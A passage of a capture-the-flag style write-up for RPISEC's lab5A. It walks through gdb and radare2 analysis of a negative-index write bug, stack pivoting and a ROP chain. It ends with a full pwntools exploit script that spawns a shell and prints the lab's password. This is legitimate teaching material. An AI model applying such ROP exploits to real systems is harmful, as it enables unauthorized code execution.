int data[STORAGE_SIZE] = {0};\r\n\r\n    \/* doom doesn't like enviroment variables *\/\r\n    clear_argv(argv);\r\n    clear_envp(envp);\r\n\r\n    printf("----------------------------------------------------\\n"\\\r\n           "  Welcome to doom's crappy number storage service!  \\n"\\\r\n           "          Version 2.0 - With more security!         \\n"\\\r\n           "----------------------------------------------------\\n"\\\r\n           " Commands:                                          \\n"\\\r\n           "    store - store a number into the data storage    \\n"\\\r\n           "    read  - read a number from the data storage     \\n"\\\r\n           "    quit  - exit the program                        \\n"\\\r\n           "----------------------------------------------------\\n"\\\r\n           "   doom has reserved some storage for himself :>    \\n"\\\r\n           "----------------------------------------------------\\n"\\\r\n           "\\n");\r\n\r\n    \/* command handler loop *\/\r\n    while(1)\r\n    {\r\n        \/* setup for this loop iteration *\/\r\n        printf("Input command: ");\r\n        res = 1;\r\n\r\n        \/* read user input, trim newline *\/\r\n        fgets(cmd, sizeof(cmd), stdin);\r\n        cmd[strlen(cmd)-1] = '\\0';\r\n\r\n        \/* select specified user command *\/\r\n        if(!strncmp(cmd, "store", 5))\r\n            res = store_number(data);\r\n        else if(!strncmp(cmd, "read", 4))\r\n            res = read_number(data);\r\n        else if(!strncmp(cmd, "quit", 4))\r\n            break;\r\n\r\n        \/* print the result of our command *\/\r\n        if(res)\r\n            printf(" Failed to do %s command\\n", cmd);\r\n        else\r\n            printf(" Completed %s command successfully\\n", cmd);\r\n\r\n        memset(cmd, 0, sizeof(cmd));\r\n    }\r\n\r\n    return EXIT_SUCCESS;\r\n}\r\n\r\n<\/pre><\/div>\r\n\r\n
You may have noticed that the source code is quite similar to the source code of lab3A<\/a>.<\/p>\r\n
What does the program do?
\r\n–> Within the main<\/code> function a 400 byte unsigned integer<\/code> array called data<\/code> is created (line 58).
\r\n–> We can trigger the function store_number<\/code> with the command store<\/code> (line 90-91).
\r\n–> The function reads a number as an unsigned integer<\/code> and an index which is cast to an integer<\/code> (line 17-18, 21-22).
\r\n–> On line 25 the prerequisites for the index and the number are examined:
\r\n– index<\/code> modulo 3<\/code> should not equal 0<\/code>.
\r\n– index<\/code> should not be greater than STORAGE_SIZE<\/code> (100<\/code>).
\r\n– the most significant byte of number<\/code> should not be 0xb7<\/code>.
\r\n–> If these conditions are met, the entered number is stored in data[index]<\/code><\/p>\r\n
What are the differences to the program of lab3A?
\r\n–> The binary has not been compiled with the -z execstack<\/code> option and thus we cannot store and execute shellcode on the stack (we will use ROP).
\r\n–> In lab3A the index was an unsigned integer<\/code> and was not cast to an integer<\/code>.
\r\n–> In lab3A there was no check if index<\/code> is greater than STORAGE_SIZE<\/code>.<\/p>\r\n
What does that mean?
\r\n–> In lab3A we could just overwrite the return address of the function main<\/code> because we could write beyond<\/u> the memory for data<\/code>.
\r\n–> This time we can enter a negative index and thus write before<\/u> the memory for data<\/code>.
\r\n–> That means that we cannot overwrite the return address of main<\/code>, but we can<\/u> overwrite the return address of store_number<\/code>.<\/p>\r\n
The following picture illustrates the stack layout:<\/p>\r\n
\"\"<\/p>\r\n
At first we determine the location of the return address of the function store_number<\/code> using gdb<\/code>:\r\n<\/p>\r\n\r\n
\r\nlab5A@warzone:\/levels\/lab05$ gdb lab5A\r\nReading symbols from lab5A...(no debugging symbols found)...done.\r\ngdb-peda$ disassemble store_number\r\nDump of assembler code for function store_number:\r\n   0x08048eae <+0>:     push   ebp\r\n   0x08048eaf <+1>:     mov    ebp,esp\r\n   0x08048eb1 <+3>:     sub    esp,0x28\r\n   ...\r\n   0x08048f62 <+180>:   leave\r\n   0x08048f63 <+181>:   ret\r\nEnd of assembler dump.\r\ngdb-peda$ b *store_number+181\r\nBreakpoint 1 at 0x8048f63\r\ngdb-peda$ r\r\nStarting program: \/levels\/lab05\/lab5A\r\n----------------------------------------------------\r\n  Welcome to doom's crappy number storage service!\r\n          Version 2.0 - With more security!\r\n----------------------------------------------------\r\n Commands:\r\n    store - store a number into the data storage\r\n    read  - read a number from the data storage\r\n    quit  - exit the program\r\n----------------------------------------------------\r\n   doom has reserved some storage for himself :>\r\n----------------------------------------------------\r\n\r\nInput command: store\r\n Number: 1\r\n Index: 1\r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0x0\r\nEBX: 0xbffff568 --> 0x0\r\nECX: 0x1\r\nEDX: 0xbffff56c --> 0x1\r\nESI: 0x0\r\nEDI: 0xbffff6f8 ("store")\r\nEBP: 0xbffff728 --> 0x8049990 (<__libc_csu_fini>:       push   ebx)\r\nESP: 0xbffff53c --> 0x804912e (<main+378>:      mov    DWORD PTR [esp+0x24],eax)\r\nEIP: 0x8048f63 (<store_number+181>:     ret)\r\nEFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n   0x8048f5b <store_number+173>:        mov    DWORD PTR [edx],eax\r\n   0x8048f5d <store_number+175>:        mov    eax,0x0\r\n   0x8048f62 <store_number+180>:        leave\r\n=> 0x8048f63 <store_number+181>:        ret\r\n   0x8048f64 <read_number>:     push   ebp\r\n   0x8048f65 <read_number+1>:   mov    ebp,esp\r\n   0x8048f67 <read_number+3>:   sub    esp,0x28\r\n   0x8048f6a <read_number+6>:   mov    DWORD PTR [ebp-0xc],0x0\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbffff53c --> 0x804912e (<main+378>:     mov    DWORD PTR [esp+0x24],eax)\r\n0004| 0xbffff540 --> 0xbffff568 --> 0x0\r\n0008| 0xbffff544 --> 0x80bfa48 ("store")\r\n0012| 0xbffff548 --> 0x5\r\n0016| 0xbffff54c --> 0x0\r\n0020| 0xbffff550 --> 0x0\r\n0024| 0xbffff554 --> 0x0\r\n0028| 0xbffff558 --> 0xbffff814 --> 0x0\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 1, 0x08048f63 in store_number ()\r\n\r\n<\/pre><\/div>\r\n\r\n
I just set a breakpoint on the ret<\/code> instruction of store_number<\/code>, started the program an entered some numbers. When the breakpoint is hit, we can examine the return address is on top of the stack. The address is located at 0xbffff53c<\/code>.<\/p>\r\n
Now we also need the address of the buffer data<\/code>:\r\n<\/p>\r\n\r\n
\r\ngdb-peda$ disassemble main\r\nDump of assembler code for function main:\r\n   ...\r\n   0x08049126 <+370>:   mov    DWORD PTR [esp],eax\r\n   0x08049129 <+373>:   call   0x8048eae <store_number>\r\n   ...\r\nEnd of assembler dump.\r\ngdb-peda$ b *main+373\r\nBreakpoint 2 at 0x8049129\r\ngdb-peda$ r\r\nStarting program: \/levels\/lab05\/lab5A\r\n----------------------------------------------------\r\n  Welcome to doom's crappy number storage service!\r\n          Version 2.0 - With more security!\r\n----------------------------------------------------\r\n Commands:\r\n    store - store a number into the data storage\r\n    read  - read a number from the data storage\r\n    quit  - exit the program\r\n----------------------------------------------------\r\n   doom has reserved some storage for himself :>\r\n----------------------------------------------------\r\n\r\nInput command: store\r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0xbffff568 --> 0x0\r\nEBX: 0xbffff568 --> 0x0\r\nECX: 0x80bfa4c --> 0x65720065 ('e')\r\nEDX: 0x72 ('r')\r\nESI: 0x0\r\nEDI: 0xbffff6f8 ("store")\r\nEBP: 0xbffff728 --> 0x8049990 (<__libc_csu_fini>:       push   ebx)\r\nESP: 0xbffff540 --> 0xbffff568 --> 0x0\r\nEIP: 0x8049129 (<main+373>:     call   0x8048eae <store_number>)\r\nEFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n   0x8049120 <main+364>:        jne    0x8049134 <main+384>\r\n   0x8049122 <main+366>:        lea    eax,[esp+0x28]\r\n   0x8049126 <main+370>:        mov    DWORD PTR [esp],eax\r\n=> 0x8049129 <main+373>:        call   0x8048eae <store_number>\r\n   0x804912e <main+378>:        mov    DWORD PTR [esp+0x24],eax\r\n   0x8049132 <main+382>:        jmp    0x80491a4 <main+496>\r\n   0x8049134 <main+384>:        mov    DWORD PTR [esp+0x8],0x4\r\n   0x804913c <main+392>:        mov    DWORD PTR [esp+0x4],0x80bfa4e\r\nGuessed arguments:\r\narg[0]: 0xbffff568 --> 0x0\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbffff540 --> 0xbffff568 --> 0x0\r\n0004| 0xbffff544 --> 0x80bfa48 ("store")\r\n0008| 0xbffff548 --> 0x5\r\n0012| 0xbffff54c --> 0x0\r\n0016| 0xbffff550 --> 0x0\r\n0020| 0xbffff554 --> 0x0\r\n0024| 0xbffff558 --> 0xbffff814 --> 0x0\r\n0028| 0xbffff55c --> 0xbffff7b8 --> 0x0\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 2, 0x08049129 in main ()\r\n\r\n<\/pre><\/div>\r\n\r\n
As data<\/code> is passed as an argument to store_number<\/code> we can set a breakpoint right before the call and examine the stack. data<\/code> is located at 0xbffff568<\/code>.<\/p>\r\n
Now we can calculate the offset:\r\n<\/p>\r\n\r\n
\r\nlab5A@warzone:\/levels\/lab05$ python -c 'print(0xbffff53c-0xbffff568)'\r\n-44\r\n\r\n<\/pre><\/div>\r\n\r\n
The offset of the return address of the function store_number<\/code> from the buffer data is -44<\/code>. Thus the index we need to use in order to overwrite the return address is -44 \/ 4 = -11<\/code>.<\/p>\r\n
Let’s quickly verify that:\r\n<\/p>\r\n\r\n
\r\ngdb-peda$ r\r\nStarting program: \/levels\/lab05\/lab5A\r\n----------------------------------------------------\r\n  Welcome to doom's crappy number storage service!\r\n          Version 2.0 - With more security!\r\n----------------------------------------------------\r\n Commands:\r\n    store - store a number into the data storage\r\n    read  - read a number from the data storage\r\n    quit  - exit the program\r\n----------------------------------------------------\r\n   doom has reserved some storage for himself :>\r\n----------------------------------------------------\r\n\r\nInput command: store\r\n Number: 1094795585\r\n Index: -11\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0x0\r\nEBX: 0xbffff568 --> 0x0\r\nECX: 0xfffffffe\r\nEDX: 0xbffff53c ("AAAAh\\365\\377\\277H\\372\\v\\b")\r\nESI: 0x0\r\nEDI: 0xbffff6f8 ("store")\r\nEBP: 0xbffff728 --> 0x8049990 (<__libc_csu_fini>:       push   ebx)\r\nESP: 0xbffff540 --> 0xbffff568 --> 0x0\r\nEIP: 0x41414141 ('AAAA')\r\nEFLAGS: 0x10287 (CARRY PARITY adjust zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\nInvalid $PC address: 0x41414141\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbffff540 --> 0xbffff568 --> 0x0\r\n0004| 0xbffff544 --> 0x80bfa48 ("store")\r\n0008| 0xbffff548 --> 0x5\r\n0012| 0xbffff54c --> 0x0\r\n0016| 0xbffff550 --> 0x0\r\n0020| 0xbffff554 --> 0x0\r\n0024| 0xbffff558 --> 0xbffff814 --> 0x0\r\n0028| 0xbffff55c --> 0xbffff7b8 --> 0x0\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\nStopped reason: SIGSEGV\r\n0x41414141 in ?? ()\r\n\r\n<\/pre><\/div>\r\n\r\n
I entered 1094795585<\/code> which equals 0x41414141<\/code> in hex and stored this value at index -11<\/code>. As assumed eip<\/code> is set to 0x41414141<\/code> and the program raises a segmentation fault. Thus the most important step is done: we control the instruction pointer.<\/p>\r\n
The next thing to do is to build our ROP-chain calling sys_execve(\"\/bin\/sh\")<\/code>. We already did this in the last level but now we are bound to some restrictions:<\/p>\r\n
(1) We cannot use the memory right after the return address we overwrite.
\r\n(2) Within the buffer data<\/code> we have chunks of 8 bytes, following by 4 bytes which we cannot write to.<\/p>\r\n
We will deal with these two restrictions one after the other:<\/p>\r\n
(1) stack pivoting<\/h2>\r\n
In the last level we overwrote the return address with the address of our first gadget and placed all following gadgets and required values right after this. If you have a look at the picture above again you will notice that after the return address of store_number<\/code> the argument for the function, followed by locals of main<\/code> are stored. Overwriting these values will mess up the program or our values just get overwritten. In order to tackle this problem we can use a technique called Stack Pivoting<\/i>. When we are able to execute only one gadget but control another area on the stack (the actual memory reserved for data<\/code>), we should look for a gadget which manipulates esp<\/code> so that it points to the memory we control.<\/p>\r\n
The following picture illustrates how our first gadget should redirect esp<\/code> to the memory region we can write to without messing anything up:<\/p>\r\n
\"\"<\/p>\r\n
How much bytes must be added to esp<\/code>?
\r\n–> The address of the first gadget will be placed at 0xbffff53c<\/code>.
\r\n–> data<\/code> is located at 0xbffff568<\/code>.
\r\n–> We cannot write to the first entry of data<\/code> since 0 % 3 == 0<\/code>.<\/p>\r\n
Thus we need to redirect the esp<\/code> from 0xbffff53c + 4<\/code> (since the address of the first gadget is popped of the stack) to 0xbffff568 + 4<\/code> (since we want to store the next gadget in data[1]<\/code>):\r\n<\/p>\r\n\r\n
\r\nlab5A@warzone:\/levels\/lab05$ python -c 'print((0xbffff568+4) - (0xbffff53c+4))'\r\n44\r\n\r\n<\/pre><\/div>\r\n\r\n
This means that we need to look for a gadget which will add 44 = 0x2c<\/code> to esp<\/code>:\r\n<\/p>\r\n\r\n
\r\n[0x08048d2a]> "\/R\/ add esp,0x2c;ret"\r\n[0x08048d2a]>\r\n\r\n<\/pre><\/div>\r\n\r\n
Unfortunately no hit. But as always there are plenty of ways to do things and since the binary was linked statically there are thousands of gadgets:\r\n<\/p>\r\n\r\n
\r\n[0x08048d2a]> "\/R\/ add esp,*;pop*;ret"\r\nDo you want to print 1973 lines? (y\/N)\r\n...\r\n  0x08079869         83c420  add esp, 0x20\r\n  0x0807986c             5b  pop ebx\r\n  0x0807986d             5e  pop esi\r\n  0x0807986e             5f  pop edi\r\n  0x0807986f             c3  ret\r\n...\r\n\r\n<\/pre><\/div>\r\n\r\n
This gadget adds 0x20 = 32<\/code> to esp<\/code>. So there are still 12 bytes missing. Luckily there are three pop<\/code> instruction, which will each increment esp<\/code> by 4<\/code>. Thus esp<\/code> gets incremented by 32 + 4 + 4 + 4 = 44 (0x2C)!<\/p>\r\n
(2) 8 byte chunks<\/h2>\r\n
Because of the restriction index % 3 != 0<\/code> we can only write two adjacent 4-byte values, followed by 4 reserved bytes:<\/p>\r\n
\"\"<\/p>\r\n
This means that we must prevent our ROP-chain from running into a reserved 4-byte chunk:<\/p>\r\n
\"\"<\/p>\r\n
This can be done if we find gadgets which also manipulate the stack. If we want to store a value for example into ebx<\/code>, we can do this by using a gadget which pops to eax<\/code> followed by another pop<\/code> and a ret<\/code> instruction. The second pop will take the reserved value from the stack. We cannot use this value by this way, the ret<\/code> will take an address we control. Yet again there are plenty of ways to do things.<\/p>\r\n
The picture shows two examples of how to avoid running into the reserved memory:<\/p>\r\n
\"\"<\/p>\r\n
I ended up with the following gadgets:\r\n<\/p>\r\n\r\n
\r\n[0x08048d2a]> "\/R\/ pop*;pop*;ret"\r\n  ...\r\n  0x080bf697     e814aaf9ff  call 0x805a0b0\r\n  0x080bf69c         83c414  add esp, 0x14\r\n  0x080bf69f             5b  pop ebx\r\n  0x080bf6a0             5e  pop esi\r\n  0x080bf6a1             c3  ret\r\n  ...\r\n\r\n[0x08048d2a]> "\/R\/ pop edi;ret"\r\n  ...\r\n  0x08096f85             5f  pop edi\r\n  0x08096f86             c3  ret\r\n  ...\r\n\r\n[0x08048d2a]> "\/R\/ mov ecx*;ret"\r\n  ...\r\n  0x0805befc     b9ffffffff  mov ecx, 0xffffffff\r\n  0x0805bf01         0f42c1  cmovb eax, ecx\r\n  0x0805bf04             c3  ret\r\n  ...\r\n\r\n[0x08048d2a]> "\/R\/ inc ecx;ret"\r\n  ...\r\n  0x080e9e40             41  inc ecx\r\n  0x080e9e41             c3  ret\r\n  ...\r\n\r\n[0x08048d2a]> "\/R\/ pop edx;pop*;ret"\r\n  ...\r\n  0x080695a5             5a  pop edx\r\n  0x080695a6           31c0  xor eax, eax\r\n  0x080695a8             5f  pop edi\r\n  0x080695a9             c3  ret\r\n  ...\r\n\r\n[0x08048d2a]> "\/R\/ ret"\r\n  ...\r\n  0x08096f86             c3  ret\r\n  ...\r\n\r\n[0x08048d2a]> "\/R\/ add eax, 0xb"\r\n  ...\r\n  0x08096f82         83c00b  add eax, 0xb\r\n  0x08096f85             5f  pop edi\r\n  0x08096f86             c3  ret\r\n  ...\r\n\r\n[0x08048d2a]> "\/R\/ pop*;pop*;ret"\r\n  ...\r\n  0x080bf69f             5b  pop ebx\r\n  0x080bf6a0             5e  pop esi\r\n  0x080bf6a1             c3  ret\r\n  ...\r\n\r\n[0x08048d2a]> "\/R\/ int 0x80"\r\n  ...\r\n  0x080d92c3           cd80  int 0x80\r\n  ...\r\n\r\n\r\n<\/pre><\/div>\r\n\r\n
As already said there are thousands of ways to do things. I did not find a gadget which zeros out ecx<\/code> so I used two gadgets, which will do the same:\r\n<\/p>\r\n\r\n
\r\n  mov ecx, 0xffffffff\r\n  inc ecx\r\n\r\n<\/pre><\/div>\r\n\r\n
After our ROP-chain is built, the last thing to do is to store the string \"\/bin\/sh\"<\/code> somewhere in the buffer. I decided to use index 31 and 32.<\/p>\r\n
Summing it all up we can construct the final python-script again using pwntools<\/code>:\r\n<\/p>\r\n\r\n
\r\nlab5A@warzone:\/levels\/lab05$ cat \/tmp\/exploit_lab5A.py\r\nfrom pwn import *\r\nimport sys\r\n\r\n# gadgets\r\n_add_esp_3xpop               = 0x08079869\r\n_pop_edi                     = 0x08096f85\r\n_ecx_ffffffffh               = 0x0805befc\r\n_inc_ecx                     = 0x080e9e40\r\n_pop_edx_xor_eax_eax_pop_edi = 0x080695a5\r\n_ret                         = 0x08096f86\r\n_add_eax_bh_pop_edi          = 0x08096f82\r\n_pop_ebx_pop_esi             = 0x080bf69f\r\n_int_80h                     = 0x080d92c3\r\n\r\naddr_binsh  = 0xbffff5e4\r\naddr_binsh -= int(sys.argv[1], 16)\r\n\r\ndef store(p, idx, value, skipLastRecv = False):\r\n  p.sendline(\"store\")\r\n  p.recv(100)\r\n  p.sendline(str(value))\r\n  p.recv(100)\r\n  p.sendline(str(idx))\r\n  if (not skipLastRecv): p.recv(100)\r\n\r\ndef quit_prog(p):\r\n  p.sendline(\"quit\")\r\n\r\np = process(\".\/lab5A\")\r\np.recv(500)\r\n\r\nstore(p, 31, 0x6e69622f)     # store \/bin\/sh\r\nstore(p, 32, 0x0068732f)     # at 0xbffff5e4 (gdb)\r\n\r\nidx_ret_addr = 4294967285 # -11\r\nidx = 1\r\n\r\nstore(p, idx, _ecx_ffffffffh) # overwrite return address\r\nstore(p, idx+1, _pop_edi)\r\nidx += 3\r\n\r\nstore(p, idx, _inc_ecx)\r\nstore(p, idx+1, _pop_edi)\r\nidx += 3\r\n\r\nstore(p, idx, _pop_edx_xor_eax_eax_pop_edi)\r\nstore(p, idx+1, 0x0)\r\nidx += 3\r\n\r\nstore(p, idx, _ret)\r\nstore(p, idx+1, _add_eax_bh_pop_edi)\r\nidx += 3\r\n\r\nstore(p, idx, _pop_ebx_pop_esi)\r\nstore(p, idx+1, addr_binsh)\r\nidx += 3\r\n\r\nstore(p, idx, _int_80h)\r\n\r\nstore(p, idx_ret_addr, _add_esp_3xpop, True)\r\np.interactive()\r\n\r\n<\/pre><\/div>\r\n\r\n
As usual I added an offset which can be passed as an argument to the script since the stack addresses vary a little bit.<\/p>\r\n
After trying different offsets, 0x50<\/code> finally worked:\r\n<\/p>\r\n\r\n
\r\nlab5A@warzone:\/levels\/lab05$ python \/tmp\/exploit_lab5A.py 0x50\r\n[+] Starting program '.\/lab5A': Done\r\n[*] Switching to interactive mode\r\n$ whoami\r\nlab5end\r\n$ cat \/home\/lab5end\/.pass\r\nbyp4ss1ng_d3p_1s_c00l_am1rite\r\n\r\n<\/pre><\/div>\r\n\r\n
Done! \ud83d\ude42 The final password for lab05 is byp4ss1ng_d3p_1s_c00l_am1rite<\/code>.<\/p>\r\n
","protected":false},"excerpt":{"rendered":"
In the last writeup we used different format string vulnerabilites in order to exploit the provided binaries. This writeup continues with lab05 which introduces DEP and ROP. As usual there are three levels ranging from C to A: –> lab5C –> lab5B –> lab5A<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26,7],"tags":[8,9,13,10,11,12,14],"class_list":["post-366","post","type-post","status-publish","format-standard","hentry","category-rpisec-mbe","category-writeup","tag-assembly","tag-binary","tag-elf","tag-pwn","tag-r2","tag-reversing","tag-x86"],"_links":{"self":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/366"}],"collection":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=366"}],"version-history":[{"count":38,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/366\/revisions"}],"predecessor-version":[{"id":1283,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/366\/revisions\/1283"}],"wp:attachment":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=366"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=366"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=366"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}